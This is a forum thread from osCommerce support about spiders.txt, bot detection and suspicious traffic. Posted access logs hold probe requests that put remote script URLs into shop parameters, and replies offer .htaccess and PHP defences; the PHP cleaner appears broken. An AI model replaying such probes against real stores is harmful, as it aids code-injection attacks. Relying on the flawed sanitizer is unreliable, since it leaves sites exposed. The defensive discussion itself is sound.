Jump to content
stevel

Updated spiders.txt Official Support Topic

Recommended Posts

Not really. I just figure it's a lot more data to read and loop through on every page access.

Thanks for the reply. I've also a question about bot names. The readme says: "For example, "ebot" matches Googlebot, "nbot" matches msnbot." Does it mean that these shortened names are now commonly understood by SEs upon spidering?

Share this post


Link to post
Share on other sites

No. The purpose of spiders.txt is for your osCommerce store to recognize when a spider is visiting so that it won't be assigned a session. There is no need nor attempt to identify which particular spider is visiting. For example, lots of spiders have the string "crawl" in their user agent (may show as Crawler, etc.) The string "crawl" matches all of them. Similarly, a number of spiders, including Googlebot, have the string "ebot", and non-spider visitors never (we hope) do. Therefore, any user agent string containing "ebot" as a substring is deemed a spider.

 

The search engines do not ever look at this file nor do they care. The only thing that matters is whether or not a spider is identified as a spider and a non-spider isn't incorrectly deemed a spider. The use of substrings is an attempt at optimizing the detection, that is all.

Share this post


Link to post
Share on other sites

I was confused by the "substring" term when I came across your contribution for the first time, Steve. Thanks for clarifying!

Share this post


Link to post
Share on other sites

Hello,

 

I have some IP addresses range visiting just one page at a time at my site and adding random products to a cart for a while already. The last digits of the IP addresses differ every time.

82.99.30.48 - - [04/Nov/2007:13:54:56 -0700] "GET /index.php?cName=accessories&osCsid=0e9cbf6e9135aebf9cefa420dfc61d1a HTTP/1.0" 200 39690 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.73 - - [04/Nov/2007:14:03:28 -0700] "GET /featured_products.php?osCsid=0e9cbf6e9135aebf9cefa420dfc61d1a HTTP/1.0" 200 46332 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.49 - - [04/Nov/2007:14:21:26 -0700] "GET /product_reviews.php?pName=adapt&products_id=317&language=en&osCsid=4bdff8b680aa49b36c5b88b40e7b1e2d HTTP/1.0" 200 36282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.22 - - [04/Nov/2007:14:29:51 -0700] "GET /my_points_help.php?language=de HTTP/1.0" 200 45147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.68 - - [04/Nov/2007:14:38:44 -0700] "GET /gv_faq.php?language=de HTTP/1.0" 200 34604 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.11 - - [04/Nov/2007:15:06:48 -0700] "GET /product_info.php?pName=adapt&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 42446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.67 - - [04/Nov/2007:15:14:03 -0700] "GET /product_info.php?language=de&pName=control&cName=control&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 51933 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.4 - - [04/Nov/2007:16:01:19 -0700] "GET /index.php?sort=4a&page=1&cName=modules&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 42756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.21 - - [04/Nov/2007:16:32:21 -0700] "GET /product_info.php?pName=kit-20&cName=kits&osCsid=ba8f7b14c77e6d9df1c521d15400e98b HTTP/1.0" 200 45094 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

 

etc...

What can I do with it?

 

Thanks.

Share this post


Link to post
Share on other sites

I'm having same problem with wide range. I have almost 40 - 50 different visitors with strange IP address. I replaced my old spider.txt file with new one and this start to happen after that. take a look at this.

need help

 

00:08:30 0 Guest 99.228.214.14 03:02:48 03:02:48 /

00:08:29 0 Guest 24.71.223.148 03:02:49 03:02:49 /shopping_cart.php

00:08:21 0 Guest 24.71.223.148 03:02:57 03:02:57 /satellite-accessories-c-51.html

00:07:58 0 Guest 24.71.223.148 03:03:20 03:03:20 /satellite-accessories-satellite-finders-c-51_56.html

00:07:42 0 Guest 24.71.223.148 03:03:36 03:03:36 /font-color0000ffabout-c-59.html

00:07:30 0 Guest 99.228.214.14 03:03:48 03:03:48 /captiveworks-receivers-c-41.html

00:18:09 0 Guest 71.245.29.105 02:53:09 02:56:40 /satellite-accessories-satellite-motors-c-51_57.html

00:02:43 0 Guest 24.71.223.148 03:08:35 03:08:35 /shopping_cart.php

00:02:42 0 Guest 38.113.177.227 03:08:36 03:08:36 /other-electronics-electronics-c-38_37.html

00:00:08 0 Guest 76.64.204.111 03:11:10 03:11:10 /

00:00:38 0 Guest 216.197.133.146 03:10:40 03:10:40 /

00:11:05 0 Guest 142.177.229.37 03:00:13 03:00:13 /

00:10:49 0 Guest 24.71.223.148 03:00:29 03:00:29 /satellite-dishes-c-52.html

00:10:10 0 Guest 24.71.223.148 03:01:08 03:01:08 /captiveworks-receivers-c-41.html

00:09:54 0 Guest 24.71.223.148 03:01:24 03:01:24 /shopping_cart.php?sort=2a

00:09:34 0 Guest 24.71.223.148 03:01:44 03:01:44 /shopping_cart.php

00:09:26 0 Guest 24.71.223.148 03:01:52 03:01:52 /captiveworks-receivers-c-41.html

00:07:00 0 Guest 24.71.223.148 03:04:18 03:04:18 /create_account.php

00:02:01 0 Guest 24.71.223.148 03:09:17 03:09:17 /shopping_cart.php?sort=2a

00:02:17 0 Guest 24.71.223.148 03:09:01 03:09:01 /satellite-dishes-c-52.html

00:05:30 0 Guest 99.228.214.14 03:05:48 03:05:48 /captiveworks-receivers-c-41.html

00:09:06 0 Guest 24.71.223.148 03:02:12 03:02:12 /index.php

00:05:43 0 Guest 67.158.176.139 03:05:35 03:05:35 /

00:55:07 0 Guest 66.249.67.131 02:16:11 02:58:48 /advanced_search_result.php?keywords=digital+cameras&osCsid=7a3e

00:03:00 0 Guest 24.71.223.148 03:08:18 03:08:18 /index.php

00:03:25 0 Guest 24.71.223.148 03:07:53 03:07:53 /create_account.php

00:08:34 0 Guest 65.92.100.150 03:02:44 03:02:44 /

00:03:21 0 Guest 24.71.223.148 03:07:57 03:07:57 /create_account_success.php

00:08:51 0 Guest 24.71.223.148 03:02:27 03:02:27 /products_new.php

00:09:15 0 Guest 24.71.223.148 03:02:03 03:02:03 /shopping_cart.php?sort=2a

00:06:41 0 Guest 99.228.214.14 03:04:37 03:04:37 /captiveworks-receivers-c-41.html

00:14:13 0 Guest 142.177.229.37 02:57:05 02:57:05 /pansat-receivers-c-49.html

00:13:58 0 Guest 142.177.229.37 02:57:20 02:58:45 /advanced_search_result.php?keywords=digital+cameras&osCsid=7a3e

00:04:47 0 Guest 99.228.214.14 03:06:31 03:06:31 /captain-receivers-c-43.html

00:01:39 0 Guest 24.71.223.148 03:09:39 03:09:39 /login.php

00:01:54 0 Guest 38.113.177.227 03:09:24 03:09:24 /captiveworks-cw800s-receiver-p-174.html

00:16:06 0 Guest 142.177.229.37 02:55:12 03:00:07 /index.php?currency=USD&osCsid=8e5b46b96e49fd026113e76b774d8e0f

00:12:15 0 Guest 24.71.223.148 02:59:03 02:59:03 /

00:11:53 0 Guest 65.92.100.150 02:59:25 02:59:25 /

00:11:24 0 Guest 142.177.229.37 02:59:54 02:59:54 /other-electronics-cameras-c-38_28.html

00:11:15 0 Guest 142.177.229.37 03:00:03 03:00:03 /pansat-receivers-c-49.html

00:04:13 0 Guest 24.71.223.148 03:07:05 03:07:05 /create_account.php

00:02:09 0 Guest 38.113.177.227 03:09:09 03:09:09 /

00:10:23 0 Guest 24.71.223.148 03:00:55 03:00:55 /shopping_cart.php?sort=2a

Currently there are 44 customers online

 

 

 

please help. this is happening since last 72 hours. everytime I check my who's online I see this with different numbers.

Share this post


Link to post
Share on other sites

Hi there I've just added the update spiders-large.txt and changed the file as stated to spiders.txt I'm still getting the bots below as you will see from the image any advice ? I'm new to all this so if you are able to explain it to me that would be great.

bots.jpg

 

Thank You

Regards

Ian :thumbsup:

Share this post


Link to post
Share on other sites

Looks as if my subscription to this topic expired again - sigh...

 

Ian,

 

The purpose of spiders.txt is NOT to prevent bots from spidering your site. Rather, it is to ensure that said bots don't get sessions so that they don't include session IDs in the links they index and that they stay out of functions that require a session (such as Add to Cart).

 

Irina,

 

The entries you show are (or are pretending to) come from a user browser. I agree that it looks suspicious, but there's nothing that spiders.txt can do for you since the user agent string is that of a normal browser. What you can do is add a DenyFrom entry to your .htaccess file to block accesses from this IP range (82.99.30)

 

irfan (beaman),

 

We would need to see the access log entries. A "Who's online" report is not sufficient. I'll comment that many of these look like normal users (cable modem customer, etc.)

Share this post


Link to post
Share on other sites

I am seem to be having an issue with "amazonaws" Is this a new spider? I have the most up to date spider file.

 

Thanks

 

Evan

Share this post


Link to post
Share on other sites

Doesn't seem to be a regular spider. Could be someone writing code based on Amazon Web Services. I will check my logs to see if I have hits from this, but a check of yesterday's log doesn't show anything.

 

What are you seeing - spider-like activity over many links? Please provide some sample lines from the web access log.

Share this post


Link to post
Share on other sites

I am about to block the IP address, but I really dont want too.

 

 

Not sure how to provide the web access log, but here is a sample of what I think you want:

 

/-p-100.html?language=es

Http Code: 200 Date: Jan 08 12:39:59 Http Version: HTTP/1.0 Size in Bytes: 15209

Referer: http://www.ganodermacoffee.com/product_inf...products_id=100

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]

 

 

/-p-99.html?language=es

Http Code: 200 Date: Jan 08 12:40:12 Http Version: HTTP/1.0 Size in Bytes: 15201

Referer: http://www.ganodermacoffee.com/-p-99.html

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]

 

 

/-p-99.html?language=en

Http Code: 200 Date: Jan 08 12:40:22 Http Version: HTTP/1.0 Size in Bytes: 15790

Referer: http://www.ganodermacoffee.com/-p-99.html

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]

 

 

 

/-pr-99.html

Http Code: 200 Date: Jan 08 12:40:33 Http Version: HTTP/1.0 Size in Bytes: 13829

Referer: http://www.ganodermacoffee.com/-p-99.html

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]

 

 

 

/-p-102.html?language=es

Http Code: 200 Date: Jan 08 12:40:47 Http Version: HTTP/1.0 Size in Bytes: 15215

Referer: http://www.ganodermacoffee.com/product_inf...products_id=102

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]

 

 

 

/-p-102.html?language=en

Http Code: 200 Date: Jan 08 12:41:05 Http Version: HTTP/1.0 Size in Bytes: 15843

Referer: http://www.ganodermacoffee.com/product_inf...products_id=102

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]

 

 

 

-----------------------

 

01:39:40 Guest ec2-72-44-49-100.z-1.compute-1.amazonaws.com 11:10:13 12:49:53 Gano Coffee Club (Product) Yes Yes

Name: Guest

 

ID: 0

 

IP Address: 72.44.49.100

 

User Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]

 

osCsid: 49a31cd29bce4cd3e1e32bc4ff5462e6

 

------------------

 

It seems to just keep cycling through the products and adding 1 to the cart and now it has started to add a second item to the cart for each product.

 

 

 

Referer?: http://www.ganodermacoffee.com/

Share this post


Link to post
Share on other sites

Ah. This should be blocked by "heritrix" in spiders.txt. Perhaps your store is not configured to use it?

 

I would feel better if I saw entries from an actual access log.

Edited by stevel

Share this post


Link to post
Share on other sites

Hi Steve,

 

got many hits today from "spider5.mail.ru", IP 195.239.211.234.

Browser-Identification: "Mail.Ru/1.0"

 

Don't know, if you have this little fellow right in your files ?

 

Regards

Andreas

Edited by Andreas2003

Share this post


Link to post
Share on other sites

I noticed some suspicious activities going on on my web site. It either a spider or a continuous script running. It visits my web site throughout the day, makes one click at a time, and always uses a different IP. It's hard to block it because IP changes all the time. Here is what I have in my access_log:

 

67.68.206.67 - - [30/Jan/2008:05:33:36 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

67.68.206.67 - - [30/Jan/2008:05:34:07 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48317 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:41:44 -0700] "GET /product_info.php?pName=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 72141 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:41:52 -0700] "GET /product_info.php?pName=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 72170 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:42:34 -0700] "GET /index.php?sort=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 48422 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:42:34 -0700] "GET /index.php?sort=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 48471 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

124.104.84.192 - - [30/Jan/2008:05:43:32 -0700] "GET /product_info.php?language=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 67772 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

124.104.84.192 - - [30/Jan/2008:05:43:45 -0700] "GET /product_info.php?pName=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 66375 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

64.231.108.203 - - [30/Jan/2008:05:51:28 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 71998 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:51:30 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:51:30 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 71998 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:51:32 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 12945 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:13 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48219 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:13 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:15 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48399 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:21 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 12945 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

69.159.62.217 - - [30/Jan/2008:06:20:32 -0700] "GET /index.php?sort=http://cherrygirl.h18.ru/images/cs.txt? HTTP/1.1" 200 48296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5"

124.104.84.192 - - [30/Jan/2008:06:37:02 -0700] "GET /product_info.php?language=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 67776 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

124.104.84.192 - - [30/Jan/2008:06:37:17 -0700] "GET /product_info.php?pName=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 66337 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

67.68.206.67 - - [30/Jan/2008:07:15:23 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

 

and so on...

 

Can anybody please explain what's going on and if there is something I can do about it? Any help will be appreciated. Thanks.

Edited by Irin

Share this post


Link to post
Share on other sites

It's looking to see if it can use your site for redirecting URLs in spam emails.

 

If you are not using the "Visit this product's web site" feature, you can do this. Add this code to your .htaccess file:

 

RewriteEngine On

RewriteCond %{QUERY_STRING} :/ [NC]
RewriteRule ^ - [F]

 

If you already have the RewriteEngine line in there, you don't repeat it.

 

This will cause all attempts to access your site with a URL in the parameters to fail.

Share this post


Link to post
Share on other sites
It's looking to see if it can use your site for redirecting URLs in spam emails.

 

If you are not using the "Visit this product's web site" feature, you can do this. Add this code to your .htaccess file:

 

RewriteEngine On

RewriteCond %{QUERY_STRING} :/ [NC]
RewriteRule ^ - [F]

 

If you already have the RewriteEngine line in there, you don't repeat it.

 

This will cause all attempts to access your site with a URL in the parameters to fail.

Hi Stevel,

 

Is this the feature on product_info.php "For more information, please visit this products webpage."? If yes, I do use it. I added your code to my .htaccess file. Do you think it'll prevent the script from running?

 

Thanks for your help.

Share this post


Link to post
Share on other sites
Hi Stevel,

 

Is this the feature on product_info.php "For more information, please visit this products webpage."? If yes, I do use it. I added your code to my .htaccess file. Do you think it'll prevent the script from running?

 

Thanks for your help.

 

Yes, that's the feature. You'll probably find that those links stop working. It can be worked around by changing the URL used so that it does not include the "http://" part.

Share this post


Link to post
Share on other sites
Yes, that's the feature. You'll probably find that those links stop working. It can be worked around by changing the URL used so that it does not include the "http://" part.

Stevel,

 

Thanks a lot for your help. Since I added your code to my .htaccess file, I don't see any more strange URLs accessing my web site. It stopped all the attempts of using my web site for suspicious purposes. The redirect feature also seems to be working fine, the URL used to redirect to the web page is http://myshop.com/redirect.php?action=url&...cts%2Fpage.html. Thanks to you I got this problem sorted.

 

Thanks again.

Share this post


Link to post
Share on other sites

You're welcome. You should see "403" (Forbidden) errors show up in the log, but you'll see a lot fewer of those over time. You can rest assured that this closes off one possible way for spammers to abuse your site.

Share this post


Link to post
Share on other sites
You're welcome. You should see "403" (Forbidden) errors show up in the log, but you'll see a lot fewer of those over time. You can rest assured that this closes off one possible way for spammers to abuse your site.

Yep, I can see some "403" errors in my log but they are all for these strange URLs.

 

70.51.76.179 - - [30/Jan/2008:12:42:17 -0700] "GET /index.php?sort=http://ninaru.hut2.ru/images/cs.txt? HTTP/1.1" 403 307 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

76.67.138.251 - - [30/Jan/2008:12:37:56 -0700] "GET /index.php?sort=http://0xg3458.hub.io/pb.php? HTTP/1.1" 403 307 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

76.67.138.251 - - [30/Jan/2008:12:37:05 -0700] "GET /product_info.php?pName=http://0xg3458.hub.io/pb.php? HTTP/1.1" 403 314 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

64.229.149.191 - - [30/Jan/2008:12:33:45 -0700] "GET /index.php?sort=http://migirlinme.krovatka.su/index? HTTP/1.1" 403 307 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

 

There are some other URLs are showing up in my log file, may be you know what are those:

 

196.217.86.107 - - [30/Jan/2008:12:53:45 -0700] "GET /osCommerce/images/prod.jpg HTTP/1.1" 301 366 "http://all-patch.org/vb/showthread.php?p=764145#post764145" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iOpus-I-M; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MEGAUPLOAD 2.0)"

212.76.72.252 - - [30/Jan/2008:12:54:23 -0700] "GET /osCommerce/images/prod.jpg HTTP/1.1" 301 366 "http://www.bramjnet.com/vb3/showthread.php?t=99710" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7B7C664E-CCE9-11DC-A053-000FB0E14566}; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)"

212.76.72.252 - - [30/Jan/2008:12:54:24 -0700] "GET /images/prod.jpg HTTP/1.1" 200 9061 "http://www.bramjnet.com/vb3/showthread.php?t=99710" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7B7C664E-CCE9-11DC-A053-000FB0E14566}; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)"

 

Again, thanks for your help.

Edited by Irin

Share this post


Link to post
Share on other sites
RewriteEngine On

 

RewriteCond %{QUERY_STRING} :/ [NC]

RewriteRule ^ - [F]

 

 

If you already have the RewriteEngine line in there, you don't repeat it.

 

This will cause all attempts to access your site with a URL in the parameters to fail.

 

Using .htaccess really (imo) ought to be a last dirty resort in these cases. After all, we are talking about simply sanitising the $_GET variable. (maybe you $_REQUEST = $_GET + $_POST (after sanitising ofc) like me .. who needs $_COOKIE fer gods sake)

 

$_GET is often multidimensional so why not use a recursive cleaner, something like ..

 

$_GET = clean_get__recursive($_GET);

function clean_get__recursive($get_var)
{
 $get_var = preg_replace("/[^a-zA-Z0-9 _.-]/i", "", $get_var);

// Add the preg_replace to every element.
return array_map('clean_get__recursive', $get_var);
}

 

The preg_replace may be too heavy for some but the concept is sound.

Edited by Babygurgles

Share this post


Link to post
Share on other sites

Robert, that's an interesting idea but it doesn't signal to the spammers that they should go away. There's no legitimate purpose to having :/ in a $_GET parameter so the .htaccess takes care of it simply.

Share this post


Link to post
Share on other sites
Robert, that's an interesting idea but it doesn't signal to the spammers that they should go away. There's no legitimate purpose to having :/ in a $_GET parameter so the .htaccess takes care of it simply.

 

 

Perhaps a nice little error page saying #!@#! off! :D

 

Anyway .. I'm leading this thread off topic .. back to spiders.txt I think.

Edited by Babygurgles

Share this post


Link to post
Share on other sites

GAH! Livebot BEGONE!

 

I'm having hassles with livebot (livebot-65-55-165-14.search.live.com and others) impersonating real customers by using this useragent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322). This bot annoys me because it creates sessions (thereby putting osc session IDs in its index), adds things to the cart (making me excited that someone's about to buy something, then disappointing me when I realise what's going on) and doesn't play nice with spiders.txt.

 

Any idea how I can prevent this bot from creating sessions?

 

Cheers,

Max

Share this post


Link to post
Share on other sites
GAH! Livebot BEGONE!

 

I'm having hassles with livebot (livebot-65-55-165-14.search.live.com and others) impersonating real customers by using this useragent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322). This bot annoys me because it creates sessions (thereby putting osc session IDs in its index), adds things to the cart (making me excited that someone's about to buy something, then disappointing me when I realise what's going on) and doesn't play nice with spiders.txt.

 

Any idea how I can prevent this bot from creating sessions?

 

Cheers,

Max

 

If it uses the same IP every time just ban the IP from your site. I belive there is a add on for it or you can use .htaccess. http://tools.dynamicdrive.com/userban/ IP bans are not a 100% remedy and can easly ban a potential customer if not carefull.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×